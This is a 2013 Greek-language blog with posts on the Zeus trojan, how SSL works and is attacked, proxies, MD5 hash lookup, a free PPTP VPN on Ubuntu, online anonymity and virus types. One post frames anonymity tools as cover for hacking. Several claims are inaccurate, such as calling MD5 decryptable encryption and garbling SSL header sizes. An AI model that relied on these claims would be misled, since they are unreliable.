Κυριακή 10 Φεβρουαρίου 2013

Trojan Zeus: O ανθεκτικότερος ιός όλων των εποχών

Ο γνωστός σε όλους μας πλέον ηλεκτρονικός ιός Trοjan Zeus έρχεται πιο ανανεωμένος και επικίνδυνος. Ο Zeus ήταν ο λόγος που πολλοί ειδικοί ασφάλειας έχασαν τον ύπνο τους προσπαθώντας να τον καταπολεμήσουν και να επιδιορθώσουν τις ευπάθειες που εκμεταλλευόταν. Από ότι φαίνεται όμως λίγοι τα κατάφεραν, καθώς ο ιός επιστρέφει και πάλι με ανανεωμένη έκδοση (Trojan – Zeus 2.1).
Ο Trojan – Zeus 2.1 αποτελεί ένα πολύ καλά δομημένο κακόβουλο λογισμικό, ικανό να παραβιάσει πληροφοριακές υποδομές και να εκμαιεύσει εμπιστευτικά δεδομένα «κάτω από τη μύτη» σχεδόν των περισσότερων λογισμικών ασφάλειας.
Οι δημιουργοί του ιού έχουν προσθέσει περισσότερες λειτουργίες στη νέα έκδοση, καθώς η παλιά επέτρεπε στους ερευνητές να τον εντοπίσουν. Συγκεκριμένα η νέα έκδοση διαθέτει ψηφιακή υπογραφή για όλα τα αρχεία που μπορεί να μεταφορτώσει ένας χρήστης και ταυτόχρονα διατηρεί τον ιό σε κωδικοποιημένη μορφή και τον αποκωδικοποιεί μόνο όταν χρειάζεται. Έτσι κανένας δεν καταλαβαίνει ότι έχει προσβληθεί από αυτόν και συνεχίζει ανενόχλητα τη δουλειά του. Το πραγματικά εντυπωσιακό στον σχεδιασμό αυτού του ιού είναι η χρήση του. Όποτε ο ιός θέλει να κλέψει δεδομένα αποκωδικοποιείται, δημιουργεί αντίγραφο του αρχείου με τα δεδομένα που θέλει, το στέλνει στον εντολέα και στη συνέχεια σβήνει το αντιγραμμένο αρχείο για να μη γίνει αντιληπτός από τους ειδικούς ασφάλειας κατά τον έλεγχο.
Παρατηρούμε εδώ ότι οι hackers δρουν πάνω κάτω με τον ίδιο τρόπο που κάνουν και οι επιχειρήσεις. Αναζητούν κέρδη και ανανεώνουν τα «προϊόντα» και τις «υπηρεσίες» τους. Ας μην κατηγορούμε όμως μόνο τους hacker, θα έχουν και εκείνοι τον «εντολέα» τους.
Και σαν να μην έφταναν όλα αυτά ο Zeus μολύνει και τα κινητά τηλέφωνα και αξίζει να αναφέρουμε ότι σε έρευνα που πραγματοποιήθηκε τον Αύγουστο το 55% των υπολογιστών δεν μπορούσε να τον εντοπίσει, ακόμη και με τη χρήση ενημερωμένων λογισμικών ασφάλειας.
To malware είναι ο μόνος ιός που έχει απασχολήσει τόσο πολύ τους ειδικούς και θα συνεχίσει να τους απασχολεί για μεγάλο χρονικό διάστημα.

Σάββατο 26 Ιανουαρίου 2013

Πρωτόκολλο SSL (Secure Socket Layer)

Γενικά

Το πρωτόκολλο SSL αναπτύχθηκε από την Netscape Communications Corporation για την ασφαλή επικοινωνία ευαίσθητων πληροφοριών όπως προσωπικά στοιχεία και αριθμούς πιστωτικών καρτών. Η πρώτη σχεδίαση του πρωτοκόλλου έγινε τον Ιούλιο του 1994 και αποτελούσε την πρώτη έκδοση (version 1.0) και τον Οκτώβριο του ίδιου χρόνου δημοσιοποιήθηκε υπό την μορφή RFC (Request For Comments). Τον Δεκέμβριο του 1994 εκδίδεται μια επαναθεώρηση του πρωτοκόλλου, η δεύτερη έκδοση του (version 2.0). Η παρούσα έκδοση του SSL, version 3.0, παρουσιάσθηκε στο κοινό στα τέλη του 1995, ενώ από τα μέσα του 1995 είχε αρχίσει να εφαρμόζεται σε προϊόντα της εταιρίας, όπως τον Netscape Navigator.
Επειδή η Netscape επιθυμούσε την παγκόσμια υιοθέτηση του πρωτοκόλλου γεγονός που ερχόταν σε σύγκρουση με τους νόμους των Ηνωμένων Πολιτειών περί εξαγωγή κρυπτογραφικών αλγορίθμων, αναγκάστηκε να επιτρέψει την χρήση ασθενών αλγορίθμων στις εξαγόμενες εφαρμογές. Πιο συγκεκριμένα, δημιούργησε παραλλαγές των αλγόριθμων RC4-128 και RC2-128 που στην πραγματικότητα χρησιμοποιούν κλειδιά των 40 bits

Εισαγωγή στο SSL

Το πρωτόκολλο SSL έχει σχεδιαστεί για να παρέχει απόρρητη επικοινωνία μεταξύ δύο συστημάτων, από τα οποία το ένα λειτουργεί σαν client και το άλλο σαν server. Η εξασφάλιση του απορρήτου γίνεται με την κρυπτογράφηση όλων των μηνυμάτων στο επίπεδο SSL Record Protocol. Παρέχει, επιπλέον, υποχρεωτική πιστοποίηση της ταυτότητας του server και προαιρετικά της ταυτότητας του client, μέσω έγκυρων πιστοποιητικών από έμπιστες Αρχές Έκδοσης Πιστοποιητικών (Certificates Authorities). Υποστηρίζει πληθώρα μηχανισμών κρυπτογράφησης και ψηφιακών υπογραφών για αντιμετώπιση όλων των διαφορετικών αναγκών. Τέλος, εξασφαλίζει την ακεραιότητα των δεδομένων, εφαρμόζοντας την τεχνική των Message Authentication Codes (MACs), ώστε κανείς να μην μπορεί να αλλοιώσει την πληροφορία χωρίς να γίνει αντιληπτός. Όλα τα παραπάνω γίνονται με τρόπο διαφανές και απλό.
Η έκδοση 3 του πρωτοκόλλου κάλυψε πολλές αδυναμίες της δεύτερης. Οι σημαντικότερες αλλαγές έχουν να με την μείωση των απαραίτητων μηνυμάτων κατά το handshake για την εγκαθίδρυση της σύνδεσης, την επιλογή των αλγόριθμων συμπίεσης και κρυπτογράφησης από τον server και την εκ νέου διαπραγμάτευση του master-key και session-id. Ακόμα αυξάνονται οι διαθέσιμοι αλγόριθμοι και προστίθενται νέες τεχνικές για την διαχείριση των κλειδιών.
Συμπερασματικά μπορούμε να πούμε πως η έκδοση 3 του SSL είναι πιο ολοκληρωμένη σχεδιαστικά, με μεγαλύτερο εύρος υποστήριξης εφαρμογών και λιγότερες ατέλειες. Παρ' όλο που είναι συμβατή με την δεύτερη έκδοση, η χρήση της τελευταίας δεν πρέπει να προτιμάται.
Το SSL μπορεί να τοποθετηθεί στην κορυφή οποιουδήποτε πρωτοκόλλου μεταφοράς, δεν εξαρτάται από την ύπαρξη του TCP/IP και τρέχει κάτω από πρωτόκολλα εφαρμογών όπως το HTTP, FTP και TELNET. Μια αναπαράσταση του πρωτοκόλλου SSL βλέπουμε παρακάτω.

Λειτουργία του SSL

SSL Record Protocol



Ένα πακέτο SSL αποτελείται από δύο μέρη, την επικεφαλίδα και τα δεδομένα. Η επικεφαλίδα μπορεί να είναι είτε 3 bytes είτε 2 bytes, από τις οποίες περιπτώσεις η δεύτερη χρησιμοποιείται όταν τα δεδομένα χρειάζονται συμπλήρωμα (padding). Το πεδίο escape-bit στην περίπτωση των 3 bytes υπάρχει μόνο σε εκδόσεις μετά την δεύτερη του πρωτοκόλλου και προβλέπεται για ρύθμιση πληροφοριών out-of-band. Για την επικεφαλίδα των 2 bytes το μέγεθος του πακέτου είναι 32767 bytes, ενώ για την επικεφαλίδα των 3 bytes το μέγεθος είναι 16383 bytes.
Το κομμάτι των δεδομένων αποτελείται από ένα Message Authentication Code (MAC), τα πραγματικά δεδομένα και δεδομένα συμπλήρωσης, εάν χρειάζονται. Αυτό το κομμάτι είναι που κρυπτογραφείται κατά την μετάδοση. Τα συμπληρωματική δεδομένα απαιτούνται όταν οι αλγόριθμοι κρυπτογράφησης εν χρήση είναι τύπου block ciphers και ο ρόλος τους είναι να συμπληρώνουν τα πραγματικά δεδομένα ώστε το μέγεθος τους είναι πολλαπλάσιου του μεγέθους που δέχεται σαν είσοδο ο block cipher. Εάν χρησιμοποιούνται stream ciphers τότε δεν απαιτείται συμπλήρωμα και μπορεί αν χρησιμοποιηθεί η επικεφαλίδα των 2 bytes.
Το MAC είναι η digest ή hash value των secret-write key (βλέπε παρακάτω) του αποστολέα του πακέτου, των πραγματικών δεδομένων, των συμπληρωματικών δεδομένων και ενός αριθμού ακολουθίας, στην σειρά που δίνονται.
Προβλέπεται και η συμπίεση των δεδομένων (data compression) με κατάλληλους μηχανισμούς που επιλέγονται κατά το handshake, ενώ δεν αποκλείεται να χρειαστεί και τεμαχισμός της πληροφορίας σε πολλά πακέτα (fragmentation).

Αντοχή του SSL σε Γνωστές Επιθέσεις

Dictionary Attack

Αυτό το είδος της επίθεσης λειτουργεί όταν ένα μέρος του μη κρυπτογραφημένου κειμένου είναι στην κατοχή του ανέντιμων προσώπων. Το μέρος αυτό κρυπτογραφείται με χρήση κάθε πιθανού κλειδιού και έπειτα ερευνάται ολόκληρο το κρυπτογραφημένο μήνυμα μέχρι να βρεθεί κομμάτι του που να ταιριάζει με κάποιο από τα προϋπολογισμένα. Σε περίπτωση που η έρευνα έχει επιτυχία, τότε το κλειδί που χρησιμοποιήθηκε για την κρυπτογράφηση ολόκληρου του μηνύματος έχει βρεθεί.
Το SSL δεν απειλείται από αυτήν την επίθεση αφού τα κλειδιά των αλγορίθμων του είναι πολύ μεγάλα των 128 bit. Ακόμα και οι αλγόριθμοι σε εξαγόμενα προϊόντα, υποστηρίζουν 128 bit κλειδιά και παρ' όλο που τα 88 bit αυτών μεταδίδονται ανασφάλιστα, ο υπολογισμός 240 διαφορετικών ακολουθιών κάνει την επίθεση αδύνατο να επιτύχει.

Brute Force Attack

Η επίθεση αυτή πραγματοποιείται με την χρήση όλων των πιθανών κλειδιών για την αποκρυπτογράφηση των μηνυμάτων. Όσο πιο μεγάλα σε μήκος είναι τα χρησιμοποιούμενα κλειδιά, τόσο πιο πολλά είναι τα πιθανά κλειδιά. Τέτοια επίθεση σε αλγορίθμους που χρησιμοποιούν κλειδιά των 128 bits είναι τελείως ανούσια. Μόνο ο DES56 bit cipher είναι ευαίσθητος σε αυτήν την επίθεση, αλλά η χρήση του δεν συνιστάται.

Replay Attack

Όταν ένας τρίτος καταγράφει την ανταλλαγή μηνυμάτων μεταξύ client και server και προσπαθεί να ξανά χρησιμοποιήσει τα μηνύματα του client για να αποκτήσει πρόσβαση στον server, έχουμε την επίθεση replay attack. Όμως το SSL κάνει χρήση του connection-id, το οποίο παράγεται από τον server με τυχαίο τρόπο και διαφέρει για κάθε σύνδεση. Έτσι δεν είναι δυνατόν πότε να υπάρχουν δυο ίδια connection-id και το σύνολο των είδη χρησιμοποιημένων μηνυμάτων δεν γίνονται δεκτά από τον server. Το connection-id έχει μέγεθος 128 bit για πρόσθετη ασφάλεια.

Man-In-The-Middle-Attack

Η επίθεση Man-In-The-Middle συμβαίνει όταν ένας τρίτος είναι σε θέση να παρεμβάλλεται στην επικοινωνία μεταξύ του server και του client. Αφού επεξεργαστεί τα μηνύματα του client και τροποποιήσει όπως αυτός επιθυμεί, τα προωθεί στον server. Ομοίως πράττει για τα μηνύματα που προέρχονται από τον server. Δηλαδή, προσποιείται στον client ότι είναι ο server και αντίστροφα.
Το SSL υποχρεώνει τον server να αποδεικνύει την ταυτότητα του με την χρήση έγκυρου πιστοποιητικού του οποίου η τροποποίηση είναι αδύνατον. Μην ξεχνάμε την δυνατότητα επικοινωνίας των κλειδιών υπογεγραμμένα.

Αδυναμίες του SSL

Brute Force Attack Εναντίον Αδύναμων Αλγορίθμων

Η μεγαλύτερη αδυναμία του πρωτοκόλλου είναι η ευαισθησία των αλγόριθμων που χρησιμοποιούν μικρά κλειδιά. Συγκεκριμένα, οι RC4-40, RC2-40 και DES-56 εισάγουν σοβαρά προβλήματα ασφαλείας και θα πρέπει να αποφεύγονται.

Renegotiation of Session Keys (μόνο στην 2 έκδοση)

Από την στιγμή που μία σύνδεση δημιουργηθεί, το ίδιο master key χρησιμοποιείται καθ' όλη την διάρκεια της. Όταν το SSL χρησιμοποιείται πάνω από μια μακρόχρονη σύνδεση (π.χ. μιας TELNET εφαρμογής), η αδυναμία αλλαγής του master key γίνεται επικίνδυνη. Η καλύτερη μέθοδος επίλυσης αυτού του προβλήματος είναι η επαναδιαπραγμάτευση του κλειδιού σε τακτά χρονικά διαστήματα, μειώνοντας έτσι την πιθανότητα μιας επιτυχής Brute Force Attack.



Τι είναι οι proxy servers;

Proxy server είναι ένας server ο οποίος κρατάει στο δίσκο του sites τα οποία έχουν επισκεφθεί προηγούμενοι χρήστες. Χρησιμοποιώντας τον Proxy Server, η περιήγησή στο Internet γίνεται πιο γρήγορη διότι όταν "κατεβάζετε" μια σελίδα που βρίσκεται στο δίσκο του proxy, δεν λαμβάνετε τα δεδομένα από τον απομακρυσμένο υπολογιστή, αλλά τοπικά, από τον server της εταιρείας που σας παρέχει ίντερνετ και κατά συνέπεια με πολύ γρηγορότερο ρυθμό.
Η ανωνυμία είναι ένα από τα βασικά χαρακτηριστικά της ασφάλειας στο χώρο των υπολογιστών.Όσο πιο πολύ την διατηρούμε στο Internet τόσο περισσότερο ασφαλής είμαστε.
Υπάρχουν δύο τρόποι για να κρύψουμε την IP μας όταν κάνουμε περιήγηση στο Internet. Ο ένας είναι η χρησιμοποίηση proxy στον browser μας και ο άλλος μέσω κάποιων άλλων ιστοσελίδων που μας δίνουν την δυνατότητα να σερφάρουμε στο Internet ανώνυμα.
Αν λοιπόν δεν μπορούμε να βρούμε κάποιον διαθέσιμο proxy server για να κρατήσουμε την ανωνυμίας μας τότε μπορούμε να χρησιμοποιήσουμε κάποια από τις παρακάτω ιστοσελίδες. Το μόνο που χρειάζεται ουσιαστικά να κάνουμε είναι να βάλουμε την διεύθυνση της σελίδας που θέλουμε να μπούμε στο κενό πεδίο και να αρχίσουμε το σερφάρισμα.

Αυτή την επιλογή μας την προσφέρουν οι παρακάτω σελίδες:

Παρασκευή 25 Ιανουαρίου 2013

Τι είναι τα MD5 hashes και πως αποκρυπτογραφούνται

Σε αυτό το tutorial θα σας δείξω πώς να "σπάσετε" τα MD5 hash. Πρώτα απ' όλα για όσους δε γνωρίζουν το md5 hash (Message-Diggest algorithm 5) είναι ένας αλφόριθμος κρυπτογράφισης 128-bit. Αυτό το md5 είναι για να μπορείτε εσείς ο τελικός χρήστης να κάνετε επαλήθευση του αρχείου αυτού ώστε να επιβεβαιώσετε αν έχει κατέβει σωστά ή καλύτερα αν είναι πραγματικά "αυτό" το αρχείο και όχι κάποιο άλλο παραλαγμένο, μπορεί από το "κατέβασμα" ή από κάποιον χρήστη που έχει αλλάξει τον κώδικά του.
Επίσης σε αυτόν τον οδηγό θα μάθετε πως να κάνετε κι εσείς ένα τέτοιο MD5 αρχείο ώστε να μπορείτε να προσφέρετε την δυνατότητα και σε άλλους τελικούς χρήστες να επιβεβαιώνουν την εγκυρότητα του/των αρχείων σας. Απαραίτητη προυπόθεση είναι να έχετε εγκατεστημένο το εργαλείο md5sum που έρχεται συνήθως με κάθε "σωστή" διανομή. Tο πιο πιθανό να μην χρειαστεί να το εγκαταστήσετε. Για να δείτε αν το έχετε απλά κάντε whatis md5sum αν σας επιστρέψει το παρακάτω μήνυμα:
    "md5sum (1) - compute and check MD5 message digest"
    τότε είστε ready to go!!
Δεν είναι δύσκολο δείτε και από μόνοι σας.

Επαλήθευση με χρήση ενός MD5sum αρχείου:

Αν έχουμε ένα αρχείο π.χ. "file.iso" τότε θα υπάρχει και το αρχείο "file.iso.md5" το οποίο περιέχει πληροφορίες για ένα ή περισσότερα ζεύγη αρχείων και της MD5 τιμές τους. Τα περισσότερα αναφέρονται στο "file.iso.md5" και πρέπει να είναι στον ίδιο φάκελο με το αρχείο που θα γίνει η επαλήθευση δλδ το "file.iso"
    md5sum -cv file.iso.md5

Δημιουργία ενός MD5sum αρχείου

Καταρχάς καλό θα ήταν να έχουμε το αρχείο σε ένα φάκελο π.χ. δλδ να το αντιγράψουμε προσωρινά για να μπορούμε εύκολα να κάνουμε την δημιουργία.. ας υποθέσουμε ότι έχουμε το αρχείο "archive.tar.gz" και κάνουμε την εξής εντολή md5sum archive.tar.gz > archive.tar.gz.md5. Αυτό ήταν!
Με τον πρώτο τρόπο μπορείτε να κάνετε μια δοκιμή και να επαληθεύσετε το αρχείο που δημιουργήσατε με τον δεύτερο τρόπο.
Είναι πολύ χρήσιμο για αρχεία τα οποία είναι σοβαρά για το σύστημά σας. π.χ. ένα iso ενός linux distro..!!

Αποκρυπτογράφηση με χρήση σελιδας online

Ο πιο εύκολος τρόπος για να αποκρυπτογραφήσετε ένα MD5 hash είναι να επισκεφτείτε την παρακάτω ιστοσελίδα:

Εγκατάσταση VPN σύνδεσης χωρίς συνδρομή σε Ubuntu

 
Οι VPN (Virtual Private Network) συνδέσεις γίνονται όλο και πιο συνηθισμένες για αυτούς που θέλουν υψηλότερο βαθμό ασφάλειας στο Διαδίκτυο. Βλέπεται με το VPN όλη η διαδικτυακή μας κίνηση κρυπτογραφείται, με αποτέλεσμα η περιήγηση στο World Wide Web να είναι πάντα ασφαλής ανεξάρτητα ή όχι αν χρησιμοποιείται ssl security.
Έτσι ακόμα κι αν είστε ένας συνηθισμένος χρήστης του διαδικτύου ή ένας heavy torrent downloader user μπορείτε να δοκιμάσετε το VPN τόσο για να αποκρύψετε τα ευαίσθητα δεδομένα σας από τα μάτια των άλλων (ISPs, Googlebots κλπ) όσο και να κάνετε bypass τους όποιους γεωγραφικούς περιορισμούς (πχ να δείτε μια σειρά του ABC online, την στιγμή που μεταδίδεται στις ΗΠΑ ).

Ποιον VPN πάροχο να διαλέξω;

Υπάρχουν πολλοί πάροχοι VPN, για να επιλέξετε προσωπικά θα συνιστούσα να δοκιμάσετε κάποια Free trial σύνδεση προτού δεσμευτείτε με μηνιαία συνδρομή καθώς ναι μεν μπορεί να κοστίζει μόλις λίγα ευρώ τον μήνα αλλά από την άλλη καλό είναι πάντα να δοκιμάζετε τον VPN server της αρεσκείας σας για να δείτε αν σας εξυπηρετεί. Το να στήσετε στο pc σας VPN, δεν είναι δύσκολο αρκεί να ακολουθήσετε τις οδηγίες του εκάστοτε VPN provider.
Παρακάτω θα δούμε πως μπορούμε να έχουμε πρόσβαση στο SecurityKiss έναν από τους πιο αξιόπιστους Free VPN servers που έχω δοκιμάσει.

Ρύθμιση VPN σε Ubuntu


Ανοίγετε έναν νέο λογαριασμό στο SecurityKiss όπου δίνετε το email σας. Μετά από ελάχιστα δευτερόλεπτα θα σας έρθει email με τα στοιχεία της σύνδεσης σας.

ΠΡΟΣΟΧΗ!! Αν δεν το βρείτε στο inbox ελέγξτε το Spam Folder σας. Το πιο πιθανό είναι το μηνυμα εγγραφής σας να βρίσκεται στον Spam Folder του mail σας.


Πηγαίνετε στις ρυθμίσεις δικτύου και επιλέξετε με το "+" την δημιουργία μιας νέας σύνδεσης για το δίκτυό σας.

 

Στη συνέχεια, ένα νέο παράθυρο θα εμφανιστεί για να επιλέξετε τον τύπο του interface – επιλέξτε VPN.


Στη συνέχεια, επιλέξτε τον τύπο VPN – επιλέξτε PPTP (Point to Point Tunneling Protocol).


Στις ρυθμίσεις του VPN προσθέσετε τα στοιχεία του λογαριασμού σας (αυτά που έχετε λάβει με το email).


Μετά επιλέξτε ρυθμίσεις για προχωρημένους (Advanced Settings) και ενεργοποιήστε το MPPE.

 

Αυτό ήταν έχετε πλέον την δυνατότητα να απολαύσετε την ασφάλεια του VPN

Σημείωση: Η χρήση vpn μπορεί να επιβραδύνει την πλοήγηση και δεν συνιστάται όταν η ταχύτητα της σύνδεσής σας είναι πολύ αργή.

Τέλος για να συνδεθήτε στο vpn μπαίνετε στη σελίδα του vpn στο λογαριασμό που φτιάξατε επιλέγεται έναν server από αυτούς που έχει στη λίστα αντιγράφετε την ΙΡ του και στη συνέχεια τον βάζετε στη gateway της σύνδεσης vpn που φτιάξατε με την προηγούμενη διαδικασία στις συνδέσεις δικτύου. Το συγκεκριμένο vpn δηλαδή της εταιρίας securitykiss είναι free αλλά έχει τον περιορισμό να σας δίνει μέχρι 300ΜΒ/24 ώρες. Αν τώρα γίνεται συνδρομητές δίνοντας κάθε μήνα το ποσό που ζητείται εννοείτε πως δε θα έχετε περιορισμούς στη σύνδεση σας αλλά πολύ περισσότερο θα έχετε και περισσότερα οφέλη όσον αφορά την ταχύτητα και την ασφάλεια σας.

Πέμπτη 24 Ιανουαρίου 2013

Μείνετε ανώνυμοι εντός και εκτός διαδικτύου...

Σε αυτό το tutorial θα σας δείξω πώς να παραμείνετε ανώνυμοι στο διαδίκτυο. Σήμερα η ανωνυμία είναι σπουδαίο πλεονέκτημα του καθενός ειδικά μετά από την εφαρμογή των διατάξεων CISPA, SOPA κτλ κυρίως σε χώρες του εξωτερικού. Έτσι λοιπόν σε αυτό το tutorial θα σας δείξω δυο τρόπους προστασίας.
Α) Online Προστασία
Β) Offline Προστασία

Πρώτα θα αναλύσουμε την offline προστασία. Να θυμάστε ότι η offline προστασία είναι πολύ σημαντική ειδικά σε περιπτώσεις που κάποιος θέλει να προβεί σε ενέργειες hacking.

Α) Offline Προστασία
Με τον όρο offline προστασία εννοούμε την προστασία του προσωπικού μας υπολογιστή από κάθε ιό, δούρειο ίππο, σκουλήκια (worms), keyloggers κτλ. Επίσης εννοούμε και την κρυπτογράφηση κάθε μορφής προσωπικού δεδομένου αλλά και την προστασία του υπολογιστή με usernames/passwords έτσι ώστε να μη μπορεί ο καθένας να πάρει προσωπικά μας δεδομένα.

  • Malwarebytes' Anti-Malware
Πρόκειται για μια χρήσιμη εφαρμογή στον υπολογιστή που εντοπίζει και αφαιρεί malwares.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:

  • KeyScrambler
To KeyScrambler είναι μια άλλη χρήσιμη εφαρμογή με την οποία μπορείτε να κρυπτογραφήσετε ή αλλιώς να ενισχύσετε την ισχύ των κλειδιών - κωδικών σας.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • COMODO firewall
Χρησιμοποιήστε το COMODO firewall. Ειδικά αν κάποιος ασχολείται με τον τομέα του  penetration testing το comodo είναι ένα απαραίτητο εργαλείο.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • TrueCrypt
Προστατέψτε τα προσωπικά σας αρχεία χρησιμοποιώντας το TrueCrypt.  Πρόκειται για μια εφαρμογή ανοιχτού κώδικα που απευθήνεται σε λειτουργικά συστήματα Windows 7/Vista/XP, Mac OS X, και Linux.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • VMWare Player
Για penetration testing χρησιμοποιήστε αυτό το πρόγραμμα σύμφωνα με το οποίο μπορείτε να τρέξετε ένα LiveCD λειτουργικό σύστημα ενώ παράλληλα είστε για παράδειγμα στα Windows.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • DeepFreeze
To DeepFreeze είναι ένα εργαλείο που αποτρέπει κάθε είδους κοινής επίθεσης στον υπολογιστή σας. Κάντε τον υπολογιστή σας αδιαπέραστο σε επιθέσεις.
Για περισσότερες πληροφορίες
 μπορείτε να ανατρέξετε στο site:
  • TMAC
Technitium MAC Address Changer άλλάζει τη MAC διεύθυνση του υπολογιστή σας.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
http://www.technitium.com/tmac/index.html

  • CCleaner
Το CCleaner είναι ένα χρήσιμο εργαλείο για κάθε υπολογιστή. Μπορεί να χρησιμοποιηθεί για να κάνει μια γενική εκκαθάριση στο σκληρό δίσκο του υπολογιστή σας διαγράφοντας αρχεία, καθαρίζοντας τα temporary files, cache κτλ.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  •  Flash Cookie Remover
Διαγράψτε τα κακόβουλα browser cookies από κάθε περιήγηση σας στο διαδίκτυο.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:

Β) Online Προστασία
Αυτού του είδους η προστασία είναι εξίσου και περισσότερο σημαντική από την εκτός σύνδεσης προστασία.
Είδη Online Protection
  • VPN(s)
  • Proxies
  • Tor
  • SSH Tunneling

VPN (Virtual Private Network)

Το VPN είναι ένα εικονικό ιδιωτικό δίκτυο που παρέχει έναν ασφαλή τρόπο σύνδεσης στο ίντερνετ αποκρύπτοντας την ΙΡ του υπολογιστή.

Free VPNs
  • Cyberghost
  • HotSpot Shield
  • Pro XPN
  • Open VPN

Paid VPNs
  • nVPN
  • SwissVPN
HTTP Proxies και SOCKS5

Proxies

SSH Tunneling

Πράγματα που πρέπει να σκεφτείτε για SSH Tunneling.
  • PuTTy
  • Firefox
Βήματα:

1. Ανοίγω το PuTTy
2. Τοποθετώ την ΙΡ μου στο Hostname ή την ΙΡ διεύθυνση στο κενό
3. Επιλέγω το σύμβολο "+"SSH
4. Επιλέγω tunnels
5. Επιλέξτε port και κάντε κλικ στο "Dynamic"
6. Κάντε κλικ στο Add για να ανοίξετε μια σύνδεση.
7. Τώρα πάμε στο browser proxy settings βάζουμε 127.0.0.1 για ΙΡ και βάζουμε port.



Τέλος αποθηκεύουμε τις αλλαγές και κλείνουμε το παράθυρο και η ρυθμίσεις μας έγιναν.

Ιοί υπολογιστών, κατηγορίες και αντιμετώπιση

Σε αυτή την ενότητα θα δούμε τι είναι ο ιός σε έναν υπολογιστή. Ο ιός υπολογιστών είναι ένα πρόγραμμα γραμμένο αποκλειστικά για να αλλάζει τον τρόπο που λειτουργεί ο υπολογιστής σας, χωρίς την άδεια σας και
χωρίς να το γνωρίζετε.
Η πρώτη αναφορά στον όρο «Ιός υπολογιστή» έγινε το 1985, όταν ο Fred Cohen, μεταπτυχιακός φοιτητής του Πανεπιστημίου της Νότιας Kαλιφόρνια, αποφάσισε να ονομάσει τα αυτο αναπαραγόμενα προγράμματα «computer viruses» (ιοί υπολογιστών). O Cohen είχε ακολουθήσει την υπόδειξη του καθηγητή του, που με τη σειρά του είχε επηρεαστεί από μια σειρά διηγημάτων επιστημονικής φαντασίας του David Gerrold από τη δεκαετία του '70 με τον τίτλο «When HARLIE was one». Ο ίδιος ο Cohen όρισε αργότερα τον ιό υπολογιστών ως "μια ακολουθία συμβόλων, τα οποία με τη μετάφρασή τους σε ένα δεδομένο περιβάλλον προκαλούν τη μεταβολή άλλων ακολουθιών συμβόλων ούτως ώστε να περιέχουν τμήμα της αρχικής ακολουθίας".
Γενικά υποστηρίζεται σήμερα ότι ένα πρόγραμμα μπορεί να ονομαστεί ιός αν έχει τα ακόλουθα χαρακτηριστικά:
  • Προκαλεί τη μεταβολή άλλου λογισμικού, εισάγοντας το δικό του κώδικα μέσα σε αυτό.
  • Έχει την ιδιότητα να προκαλεί τέτοιου είδους μεταβολές σε περισσότερα του ενός προγράμματα.
  • Έχει τη δυνατότητα να αναγνωρίζει τις μεταβολές που το ίδιο προξένησε σε άλλα προγράμματα.
  • Έχει τη δυνατότητα να παρεμποδίζει την περαιτέρω μεταβολή(μόλυνση) αυτών των προγραμμάτων.
    Τα προγράμματα που έχουν προσβληθεί αποκτούν, με τη σειρά τους, όλα τα προαναφερθέντα χαρακτηριστικά.
 

Κατηγορίες ιών

  • Trojan Horses ή Δούρειοι Ίπποι

Στην περίπτωση αυτή έχουμε ένα τμήμα ανεπιθύμητου κώδικα κρυμμένου μέσα σε ένα τμήμα επιθυμητού κώδικα. Προμηθεύεστε, δηλαδή, ένα πρόγραμμα το οποίο εκτελεί ή υποστηρίζει ότι εκτελεί μια επιθυμητή λειτουργία και μόλις το χρησιμοποιήσετε (είτε αμέσως είτε μόλις ικανοποιηθεί μια λογική ή χρονική συνθήκη), αυτό κάνει και κάτι άλλο, συνήθως επιτρέπει την πρόσβαση σε τρίτους στον μολυσμένο υπολογιστή ή προκαλεί καταστροφές στα αρχεία του.
  • Viruses ή Ιοί

Πρόκειται για έναν ειδικό τύπο Trojan Horse, ο οποίος έχει την ικανότητα να προσαρτά τον κώδικά του σε άλλα τμήματα κώδικα, να αναπαράγει τον εαυτό του και να πολλαπλασιάζεται, καθώς και να εκτελεί κάποια καταστροφική ή ουδέτερη λειτουργία.

  • Worms ή Σκουλήκια

Αυτά μοιάζουν με τους ιούς, καθώς δεν επιτελούν καμία χρήσιμη ή επιθυμητή λειτουργία και επιπλέον μπορούν να παράγουν ακριβή αντίγραφα του εαυτού τους. Διαφέρουν, όμως στο ότι αποτελούν ανεξάρτητα και αυτόνομα προγράμματα και επιχειρούν ενεργά να διασπείρουν τον εαυτό τους και τα αντίγραφά τους μέσα σε ένα περιβάλλον δικτύου. Στόχος ενός Worm δεν είναι να προκαλέσει κάποια συγκεκριμένη ζημιά. Απλώς, με τον συνεχή πολλαπλασιασμό του, απασχολεί όλο και περισσότερους από τους πόρους (resources) του συστήματος, καθιστώντας το τελικά ανίκανο να λειτουργήσει
κανονικά.

Πως μεταδίδονται οι ιοί

Οι τρόποι με τους οποίους μπορεί ένας ιός να μεταδοθεί είναι πολλοί. Τρεις είναι αυτοί που χρησιμοποιούνται πιο συχνά:
Ανταλλαγή αρχείων: Μεταφέροντας αρχεία με δισκέτα ή με CD από υπολογιστή σε υπολογιστή ο ιός μεταδίδεται, εφ' όσον ο αρχικός
υπολογιστής ήταν μολυσμένος.
Ηλεκτρονικό Ταχυδρομείο: Μέσω των επισυναπτόμενων αρχείων του Ηλεκτρονικού ταχυδρομείου μπορεί να μεταδοθεί κάποιος ιός. Το ηλεκτρονικό ταχυδρομείο συνήθως προσβάλλεται από «Σκουλήκια» («Worms»).
Παγκόσμιος Πληροφοριακός Ιστός: Όταν «κατεβάζετε»
(Download) αρχεία από το Διαδίκτυο κάποιο απ’ αυτά μπορεί να περιέχει ιό. Το σύνηθες εδώ είναι οι “Δούρειοι Ίπποι” (“Trojan Horses”).
Τα αρχεία που περιέχουν έναν ιό, είναι είτε εκτελέσιμα αρχεία (αρχεία εφαρμογών) είτε αρχεία κειμένου και λογιστικών φύλλων τα οποία περιέχουν μακροεντολές.

Αντιμετώπιση

